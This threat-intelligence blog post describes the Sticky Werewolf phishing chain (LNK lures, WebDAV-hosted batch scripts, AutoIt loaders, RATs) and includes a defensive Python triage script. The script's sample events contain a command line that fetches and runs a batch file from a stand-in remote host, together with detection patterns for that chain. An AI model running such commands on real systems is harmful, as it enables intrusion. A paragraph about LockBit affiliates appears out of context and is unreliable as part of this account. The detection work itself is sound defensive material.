
Expanding Cyber Threats: Sticky Werewolf Targets Russia and Belarus

Posted on: 11 Jun 2024 | Author: Foresiet

Introduction

The cyber threat landscape is constantly evolving, with new threat actors emerging and expanding their targets. Cybersecurity researchers have recently revealed information about a threat actor named Sticky Werewolf, who has been associated with cyber attacks on organizations in Russia and Belarus. This development highlights the critical need for robust cybersecurity measures, including stolen credentials detection, darknet monitoring services, and dark web surveillance.

Sticky Werewolf's Expanding Reach

Sticky Werewolf has shifted its focus from targeting government organizations to a broader range of entities, including a pharmaceutical company, a Russian research institute involved in microbiology and vaccine development, and the aviation sector. These phishing attacks represent an expansion of the threat actor’s initial targets.

In earlier campaigns, the attack sequence started with phishing emails containing a link to download a malicious file from file-sharing sites such as gofile.io. In the most recent campaign, the attackers instead used archive attachments containing LNK files that pointed to a payload hosted on WebDAV servers.

Evolution of the Attack Chain

Sticky Werewolf’s tactics have evolved, now employing RAR archive attachments that contain two LNK files and a decoy PDF document. The decoy, disguised as an invitation to a video conference, urges recipients to click on the LNK files to access the meeting agenda and email distribution list. Opening these LNK files triggers the execution of a binary hosted on a WebDAV server, launching an obfuscated Windows batch script. This script runs an AutoIt script that injects the final payload while bypassing security software and analysis attempts.

Researchers described the dropped binary as follows: “This executable is an NSIS self-extracting archive, part of a previously known crypter named CypherIT. While the original CypherIT crypter is no longer being sold, the current executable is a variant of it, as observed in a couple of hacking forums.”

The ultimate goal of these attacks is to deliver commodity remote access trojans (RATs) and information stealer malware such as Rhadamanthys and Ozone RAT.
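The chain described above (LNK opened from Explorer, cmd.exe pulling a batch script over a WebDAV UNC path, then an AutoIt interpreter running a script) leaves recognisable traces in process-creation telemetry. The triage below is an added illustration, not Foresiet's or the original researchers' code; the event records are constructed, and the heuristics (Windows WebDAV client path forms such as `\\host@SSL\DavWWWRoot\`, an explorer.exe-to-cmd.exe parent chain, and the AutoIt3 interpreter name) are the author's assumptions about what such a chain looks like on an endpoint.

```python
import re
from pathlib import PureWindowsPath

# Windows WebDAV client (Mini-Redirector) UNC forms: \\host\DavWWWRoot\..., \\host@SSL\..., \\host@SSL@443\...
WEBDAV_UNC = re.compile(
    r"\\\\[^\\\s]+?(?:@ssl)?(?:@\d{1,5})?\\davwwwroot\\|\\\\[^\\\s]+?@ssl(?:@\d{1,5})?\\",
    re.IGNORECASE)
# A batch script launched from any UNC path (remote share or WebDAV), as in the LNK lure
REMOTE_BATCH = re.compile(r"\\\\[^\\\s]+\\[^\s]*\.(?:bat|cmd)\b", re.IGNORECASE)
# Compiled (.a3x) or plain (.au3) AutoIt scripts passed to an interpreter
AUTOIT_SCRIPT = re.compile(r"\.(?:a3x|au3)\b", re.IGNORECASE)

# Constructed Sysmon-style process-creation events; none of this is real telemetry.
SAMPLE_EVENTS = [
    {"pid": 4412, "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c \\203.0.113.5@SSL\DavWWWRoot\meeting\agenda.bat"},
    {"pid": 5120, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\u\AppData\Local\Temp\svc\AutoIt3.exe",
     "cmdline": r"AutoIt3.exe C:\Users\u\AppData\Local\Temp\svc\run.a3x"},
    {"pid": 6001, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'WINWORD.EXE "C:\Users\u\Documents\report.docx"'},
    {"pid": 6102, "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c C:\tools\build.bat"},  # local batch file: benign
]

def basename(path):
    return PureWindowsPath(path).name.lower()

def triage_event(ev):
    """Return the reasons one process-creation event matches the chain (empty list if none)."""
    reasons = []
    text = f"{ev['image']} {ev['cmdline']}"
    if WEBDAV_UNC.search(text):
        reasons.append("webdav_unc_path")
    # Double-clicking an LNK in Explorer yields explorer.exe -> cmd.exe; a remote .bat in that
    # position is the hallmark of the lure (assumption: the LNK target is a cmd.exe command line)
    if basename(ev["parent"]) == "explorer.exe" and basename(ev["image"]) == "cmd.exe" \
            and REMOTE_BATCH.search(ev["cmdline"]):
        reasons.append("lnk_to_remote_batch")
    if basename(ev["image"]).startswith("autoit3") or AUTOIT_SCRIPT.search(ev["cmdline"]):
        reasons.append("autoit_interpreter")
    return reasons

def triage(events):
    """Return (pid, reasons) for every event that matched at least one heuristic."""
    return [(ev["pid"], r) for ev in events if (r := triage_event(ev))]

if __name__ == "__main__":
    for pid, reasons in triage(SAMPLE_EVENTS):
        print(pid, ", ".join(reasons))
```

The AutoIt rule on its own is noisy in environments that ship legitimate AutoIt tooling; it is the combination with a WebDAV-sourced batch file in the same process tree that makes the chain worth escalating.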

Broader Cybersecurity Context

As affiliates of LockBit, Astamirov and Vasiliev identified and exploited vulnerable computer systems. They deployed ransomware to encrypt data, demanding ransoms for decryption and the promise to delete exfiltrated information. If victims refused to pay, their data remained encrypted, and the stolen data was published on LockBit’s dark web leak site. This highlights the importance of robust digital footprint analysis and brand protection to mitigate such threats.

Geopolitical Implications

While there is no definitive evidence pointing to a specific national origin for Sticky Werewolf, the geopolitical context suggests possible links to a pro-Ukrainian cyberespionage group or hacktivists. However, this attribution remains uncertain.

Recent developments also include BI.ZONE’s discovery of an activity cluster named Sapphire Werewolf, responsible for over 300 attacks on Russian education, manufacturing, IT, defense, and aerospace engineering sectors. These attacks utilized Amethyst, an offshoot of the open-source SapphireStealer.

Additionally, clusters referred to as Fluffy Wolf and Mysterious Werewolf have been uncovered, using spear-phishing lures to distribute various malware, including Remote Utilities, XMRig miner, WarZone RAT, and a bespoke backdoor dubbed RingSpy. According to BI.ZONE, the RingSpy backdoor allows attackers to execute commands remotely, retrieve the results, and download files from network resources. “The backdoor’s [command-and-control] server is a Telegram bot.”

Conclusion

The expanding reach and evolving tactics of threat actors like Sticky Werewolf highlight the dynamic nature of cybersecurity threats. Organizations must prioritize advanced security measures such as stolen credentials detection, darknet monitoring services, and dark web surveillance. Implementing comprehensive digital footprint analysis, brand protection, and brand impersonation defense strategies is crucial to safeguarding against these sophisticated cyber threats. Moreover, online risk evaluation and digital threat scoring can help organizations stay ahead of potential threats, ensuring robust protection in an increasingly hostile digital environment. Stay vigilant and prioritize security to safeguard against these formidable adversaries.

About Foresiet!

Foresiet is the pioneering force in digital security solutions, offering the first integrated Digital Risk Protection SaaS platform. With 24x7x365 dark web monitoring and proactive threat intelligence, Foresiet safeguards against data breaches and intellectual property theft. Our robust suite includes brand protection, takedown services, and supply chain assessment, enhancing your organization’s defense mechanisms. Attack surface management is a key component of our approach, ensuring comprehensive protection across all vulnerable points. Compliance is assured through adherence to ISO27001, NIST, GDPR, PCI, SOX, HIPAA, SAMA, CITC, and Third Party regulations. Additionally, our advanced antiphishing shield provides unparalleled protection against malicious emails. Trust Foresiet to empower your organization to navigate the digital landscape securely and confidently.
